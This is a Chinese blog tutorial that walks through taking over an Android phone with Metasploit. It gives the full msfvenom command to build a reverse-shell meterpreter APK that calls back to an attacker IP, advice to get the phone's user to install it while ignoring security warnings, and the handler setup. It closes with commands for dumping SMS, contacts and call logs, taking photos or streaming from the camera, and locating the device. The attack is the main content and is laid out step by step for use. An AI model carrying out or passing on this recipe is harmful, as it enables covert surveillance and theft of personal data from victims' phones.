kail Metasploit之渗透安卓实战

实验环境:kail linux 2020.3               安卓版本:10     机型: Mi 10 pro

kail  IP: 10.9.152.7

注意攻击机需要与安卓手机处于一个网段,虚拟机实验的话需要桥接模式,不然安卓的数据包会传输不回去

 

生成木马程序

设置监听主机  lhost=

设置监听主机端口  lport=

设置保存目录  R>

msfvenom -p android/meterpreter/reverse_tcp lhost=10.9.152.7 lport=9999 R >wl.apk

 

 

将程序传送到手机

通过虚拟机将木马程序apk传送到实机,建议通过QQ传输再传到手机

手机安装的时候,无视安全错误,继续安装

 

使用metasploit渗透工具

打开终端,输入代码

# msfconsole

等待工具启动,然后设置handler模块

一般有5种模块:
1.渗透攻击模块(exploit),用于实际发起渗透攻击;
2.辅助模块(auxiliary),执行扫描之类的动作;
3. 后渗透攻击模块(post),进一步渗透测试
4. 攻击载荷模块(payload),目标系统被成功渗透后执行的代码,payload中的主要内容包括 shellcode,一段获取 shell 的代码。
5.后门监听模块( handler)

> use exploit/multi/handler

使用安卓的攻击负载模块

> set payload android/meterpreter/reverse_tcp

设置监听IP,为你攻击服务器的本机IP,与创建木马文件时保持一致

> set lhost 10.9.152.7

设置监听的端口,与创建木马文件时保持一致

> set lport 9999

检查设置是否有误

show options

没有错误就可以开始监听

exploit

重要!,监听后需要在手机点击刚刚安装完成的程序

设置,攻击服务器就显示  meterpreter > 已经攻击完成

 

渗透演示

下载手机短信记录,若获取失败,需要手动在手机提升软件的权限,小米的安全系统还是做的很足的

dump_sms

这时在桌面就会出现下载的短信文件,打开

 

常用指令

search                    -->搜索文件,命令:search text.jpg
download              -->下载文件,命令:download test.jpg
webcam_list               -->查看摄像头列表,因为手机都是前置和后置摄像头了
webcam_snap              -->拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1
webcam_stream              -->开启摄像头视频监控,同上,命令:webcam_stream -i 1
安卓系统相关命令:
check_root -                       ->查看当前安卓是否已经root
dump_calllog                     -->下载通话记录
dump_contacts                      -->下载短信记录
dump_sms                       -->下载通讯录
geolocate                      -->利用谷歌地图定位(需要安装谷歌地图)

 

 

 

作者: 红烧悠鸽
本文采用 CC BY-NC-SA 4.0 协议
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇